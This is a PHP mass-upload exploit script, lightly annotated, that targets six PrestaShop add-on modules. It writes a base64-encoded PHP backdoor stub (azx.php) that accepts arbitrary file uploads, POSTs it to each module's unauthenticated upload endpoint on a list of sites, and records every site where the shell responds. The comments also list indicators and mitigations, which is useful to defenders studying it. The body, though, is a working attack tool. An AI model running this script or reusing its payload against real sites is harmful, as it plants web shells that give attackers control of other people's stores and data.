- <?php
- // Bulk uploader aimed at PrestaShop add-on modules. It takes a list of sites from a web form,
- // POSTs a small PHP upload stub (azx.php) to six module upload endpoints per site, then fetches
- // the expected landing URL and records every URL that answers with the stub's marker string.
- //
- // Indicators visible in this listing: file name "azx.php", response marker "AZZATSSINS",
- // multipart field "userfile" on the POST, and (inside the stub) the form field "azzatssins".
- // Log pattern implied by the code: a POST to /modules/<module>/uploadimage.php (file_upload.php
- // for attributewizardpro) followed by a GET of /modules/<module>/slides/azx.php
- // (file_uploads/azx.php for attributewizardpro), presumably from the same source address.
- // Mitigation: remove or update the six modules named below, deny PHP execution in their
- // slides/ and file_uploads/ directories, and search those directories for *.php files.
- //
- // Error output is silenced and the execution time limit is removed.
- error_reporting(0);
- set_time_limit(0);
- ini_set('display_errors', 0);
- // Operator form: textarea "azx" holds the site list, submit button "anu" starts the run.
- echo '<title>PRESTASHOP | UPLOAD</title><body bgcolor=silver><center><form method="post"><center><textarea name="azx"></textarea><br>
- <br><input name="anu" type="submit" value="Submit"></form></center><br><pre>';
- // Everything below runs only when the form was submitted.
- if($_POST['anu']){
- // One list entry per CRLF-separated line of the textarea.
- $ex=explode("\r\n",$_POST['azx']);
- // ASCII-art banner.
- echo"
- \n ___ ________ ___ ___________________ ______\n / _ /_ /_ / / _ /_ __/ __/ __/ _/ |/ / __/\n / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ // /\ \ \n/_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/ \n \n";
- // Status line (count() is applied to the raw textarea value, not to the split list $ex).
- echo"\n Scan ".count($_POST['azx'])." website\n\n";
- foreach($ex as $sites){
- // Self backdoor creator
- // $azouz is base64 for a PHP stub: when a file is posted in field "azzatssins" it saves the
- // file under the client-supplied name and echoes that name; on any other request it prints
- // "AZZATSSINS" followed by an upload form. That marker is what the checks below search for.
- $azouz = 'PD9waHAgaWYoaXNzZXQoJF9GSUxFU1snYXp6YXRzc2lucyddWyduYW1lJ10pKXskbmFtZSA9ICRf
- RklMRVNbJ2F6emF0c3NpbnMnXVsnbmFtZSddOyRhenggPSAkX0ZJTEVTWydhenphdHNzaW5zJ11b
- J3RtcF9uYW1lJ107QG1vdmVfdXBsb2FkZWRfZmlsZSgkYXp4LCAkbmFtZSk7IGVjaG8gJG5hbWU7
- fWVsc2V7IGVjaG8gIkFaWkFUU1NJTlMgPGJyPjxmb3JtIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVs
- dGlwYXJ0L2Zvcm0tZGF0YT48aW5wdXQgdHlwZT1maWxlIG5hbWU9YXp6YXRzc2lucz48aW5wdXQg
- dHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz4iOw==';
- // The decoded stub is written to azx.php in the working directory on every loop iteration;
- // the handle in $file is not closed in this listing.
- $file = fopen("azx.php" ,"w+");
- $write = fwrite ($file ,base64_decode($azouz));
- // Mode 0044: read bit for group and others only.
- chmod("azx.php",0044);
- // Progress line, then surrounding whitespace is stripped from the entry.
- echo " \nScaning > $sites";
- $sites=trim($sites);
- //////////// modules classes
- // Module 1/6, simpleslideshow: upload endpoint uploadimage.php, expected landing path slides/azx.php.
- echo "\n\n Testing Simpleslideshow";
- $uploadfile="azx.php";
- $url = "/modules/simpleslideshow/uploadimage.php";
- $url2 = "/modules/simpleslideshow/slides/azx.php";
- // "$sites.$url" is string interpolation, not concatenation: the "." is sent literally between
- // the list entry and the path. The verification GET further down concatenates without it.
- $ch = curl_init("$sites.$url");
- curl_setopt($ch, CURLOPT_POST, true);
- // Multipart POST, field "userfile", value built with the "@" file-attachment prefix.
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- // The POST response ($postResult) is never inspected; success is judged only by the GET below.
- $postResult = curl_exec($ch);
- curl_close($ch);
- // Fetch the landing URL (errors suppressed by @) and look for the stub's marker.
- $get1=@file_get_contents($sites.$url2);
- if(preg_match('#AZZATSSINS#',$get1)){
- // Hit: print the URL and append it to azx.htm in the working directory.
- echo "\n\t $sites$url2";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url2."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail ";
- }
- ////////////
- // Module 2/6, productpageadverts: same sequence (POST to uploadimage.php, GET slides/azx.php).
- echo "\n Testing Productpageadverts";
- $uploadfile2="azx.php";
- $url3 = "/modules/productpageadverts/uploadimage.php";
- $url24 = "/modules/productpageadverts/slides/azx.php";
- $ch = curl_init("$sites.$url3");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get12=@file_get_contents($sites.$url24);
- if(preg_match('#AZZATSSINS#',$get12)){
- echo "\n\t $sites$url24";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url24."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- ////////////
- // Module 3/6, columnadverts: same sequence (POST to uploadimage.php, GET slides/azx.php).
- echo "\n Testing Columnadverts";
- $uploadfile23="azx.php";
- $url34 = "/modules/columnadverts/uploadimage.php";
- $url245 = "/modules/columnadverts/slides/azx.php";
- $ch = curl_init("$sites.$url34");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile23"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get123=@file_get_contents($sites.$url245);
- if(preg_match('#AZZATSSINS#',$get123)){
- echo "\n\t $sites$url245";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url245."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- ////////////
- // Module 4/6, homepageadvertise: same sequence (POST to uploadimage.php, GET slides/azx.php).
- echo "\n Testing Homepageadvertise";
- $uploadfile234="azx.php";
- $url345 = "/modules/homepageadvertise/uploadimage.php";
- $url2456 = "/modules/homepageadvertise/slides/azx.php";
- $ch = curl_init("$sites.$url345");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile234"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get124=@file_get_contents($sites.$url2456);
- if(preg_match('#AZZATSSINS#',$get124)){
- echo "\n\t $sites$url2456";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url2456."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- //////////
- // Module 5/6, attributewizardpro: different script and directory names here
- // (POST to file_upload.php, GET file_uploads/azx.php); the sequence is otherwise the same.
- echo "\n Testing Attributewizardpro";
- $uploadfile2345="azx.php";
- $url3456 = "/modules/attributewizardpro/file_upload.php";
- $url24567 = "/modules/attributewizardpro/file_uploads/azx.php";
- $ch = curl_init("$sites.$url3456");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2345"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get125=@file_get_contents($sites.$url24567);
- if(preg_match('#AZZATSSINS#',$get125)){
- echo "\n\t $sites$url24567";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url24567."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- ///////////
- // Module 6/6, vtemslideshow: same sequence (POST to uploadimage.php, GET slides/azx.php).
- echo "\n Testing Vtemslideshow";
- $uploadfile2349="azx.php";
- $url3450 = "/modules/vtemslideshow/uploadimage.php";
- $url24560 = "/modules/vtemslideshow/slides/azx.php";
- $ch = curl_init("$sites.$url3450");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2349"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get1276=@file_get_contents($sites.$url24560);
- if(preg_match('#AZZATSSINS#',$get1276)){
- echo "\n\t $sites$url24560";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url24560."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail \n";
- // The two braces below close the else branch and the per-site foreach.
- } }
- // Closes the form-submitted check.
- }
- ?>